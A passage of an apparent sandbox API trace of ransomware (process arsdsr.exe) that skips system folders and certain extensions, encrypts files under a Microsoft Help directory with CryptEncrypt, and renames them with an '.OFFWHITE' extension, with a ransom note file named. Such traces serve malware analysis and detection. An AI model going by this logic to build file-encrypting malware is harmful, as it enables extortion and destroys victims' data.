Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.525] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x152, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.525] SetLastError (dwErrCode=0x0) [0147.525] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.527] GetLastError () returned 0x0 [0147.527] GetLastError () returned 0x0 [0147.527] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x252, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.527] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.527] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x352, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.527] WriteFile (in: hFile=0xb0, lpBuffer=0x526c68*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526c68*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.527] GetProcessHeap () returned 0x500000 [0147.527] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x152) returned 0x51d650 [0147.527] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.527] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x152, lpOverlapped=0x0) returned 1 [0147.528] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.528] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x152, lpOverlapped=0x0) returned 1 [0147.528] GetProcessHeap () returned 0x500000 [0147.528] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.528] CloseHandle (hObject=0xb0) returned 1 [0147.528] GetProcessHeap () returned 0x500000 [0147.528] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.528] GetProcessHeap () returned 0x500000 [0147.528] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.528] GetProcessHeap () returned 0x500000 [0147.528] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.528] GetProcessHeap () returned 0x500000 [0147.528] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.528] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" [0147.528] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.OFFWHITE" [0147.528] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn.offwhite")) returned 1 [0147.529] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x26af670, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.OUTLOOK.DEV.14.1033.hxn", cAlternateFileName="MSOUTL~2.HXN")) returned 1 [0147.529] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2=".") returned 1 [0147.529] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="..") returned 1 [0147.529] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="...") returned 1 [0147.529] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="windows") returned -1 [0147.529] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.529] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="rsa") returned -1 [0147.529] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.529] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="programdata") returned -1 [0147.529] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="appdata") returned 1 [0147.530] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="program files") returned -1 [0147.530] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.530] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.530] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.OUTLOOK.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" [0147.530] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.530] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.530] PathFindExtensionW (pszPath="MS.OUTLOOK.DEV.14.1033.hxn") returned=".hxn" [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.530] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.530] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.530] GetProcessHeap () returned 0x500000 [0147.530] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526c78 [0147.531] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.531] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=362) returned 1 [0147.531] GetProcessHeap () returned 0x500000 [0147.531] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.531] GetProcessHeap () returned 0x500000 [0147.531] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.531] GetProcessHeap () returned 0x500000 [0147.531] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.531] GetProcessHeap () returned 0x500000 [0147.531] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.531] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.531] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.531] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.531] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.531] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.531] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.532] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.532] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.532] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.532] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.532] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.532] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.532] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.532] SetLastError (dwErrCode=0x0) [0147.532] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.534] GetLastError () returned 0x0 [0147.534] GetLastError () returned 0x0 [0147.534] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x26a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.534] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.534] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x36a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.534] WriteFile (in: hFile=0xb0, lpBuffer=0x526c78*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526c78*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.534] GetProcessHeap () returned 0x500000 [0147.534] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16a) returned 0x52ebe8 [0147.534] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.534] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x16a, lpOverlapped=0x0) returned 1 [0147.535] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.535] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x16a, lpOverlapped=0x0) returned 1 [0147.535] GetProcessHeap () returned 0x500000 [0147.535] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.535] CloseHandle (hObject=0xb0) returned 1 [0147.535] GetProcessHeap () returned 0x500000 [0147.535] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.535] GetProcessHeap () returned 0x500000 [0147.535] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.535] GetProcessHeap () returned 0x500000 [0147.535] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.535] GetProcessHeap () returned 0x500000 [0147.535] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.535] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" [0147.535] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.OFFWHITE" [0147.535] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn.offwhite")) returned 1 [0147.536] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5fec970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.POWERPNT.14.1033.hxn", cAlternateFileName="MSPOWE~1.HXN")) returned 1 [0147.536] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2=".") returned 1 [0147.536] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="..") returned 1 [0147.536] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="...") returned 1 [0147.536] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="windows") returned -1 [0147.536] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.536] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="rsa") returned -1 [0147.536] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.536] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="programdata") returned -1 [0147.536] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="appdata") returned 1 [0147.536] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="program files") returned -1 [0147.536] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.536] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.536] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.POWERPNT.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" [0147.536] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.536] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.537] PathFindExtensionW (pszPath="MS.POWERPNT.14.1033.hxn") returned=".hxn" [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.537] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.537] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.537] GetProcessHeap () returned 0x500000 [0147.537] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526c88 [0147.537] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.538] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=344) returned 1 [0147.538] GetProcessHeap () returned 0x500000 [0147.538] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.538] GetProcessHeap () returned 0x500000 [0147.538] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.539] GetProcessHeap () returned 0x500000 [0147.539] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.539] GetProcessHeap () returned 0x500000 [0147.539] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.539] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.539] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.539] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.539] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.539] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.539] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.539] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.539] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.539] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.539] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.539] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.539] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.539] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x158, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.539] SetLastError (dwErrCode=0x0) [0147.540] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.541] GetLastError () returned 0x0 [0147.541] GetLastError () returned 0x0 [0147.541] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x258, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.541] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.541] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x358, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.541] WriteFile (in: hFile=0xb0, lpBuffer=0x526c88*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526c88*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.541] GetProcessHeap () returned 0x500000 [0147.541] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x158) returned 0x51d650 [0147.541] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.541] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x158, lpOverlapped=0x0) returned 1 [0147.541] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.541] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x158, lpOverlapped=0x0) returned 1 [0147.542] GetProcessHeap () returned 0x500000 [0147.542] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.542] CloseHandle (hObject=0xb0) returned 1 [0147.542] GetProcessHeap () returned 0x500000 [0147.542] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.542] GetProcessHeap () returned 0x500000 [0147.542] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.542] GetProcessHeap () returned 0x500000 [0147.542] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.542] GetProcessHeap () returned 0x500000 [0147.542] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.542] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" [0147.543] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.OFFWHITE" [0147.543] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn.offwhite")) returned 1 [0147.543] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5fec970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.POWERPNT.DEV.14.1033.hxn", cAlternateFileName="MSPOWE~2.HXN")) returned 1 [0147.543] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2=".") returned 1 [0147.544] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="..") returned 1 [0147.544] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="...") returned 1 [0147.544] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="windows") returned -1 [0147.544] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.544] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="rsa") returned -1 [0147.544] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.544] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="programdata") returned -1 [0147.544] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="appdata") returned 1 [0147.544] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="program files") 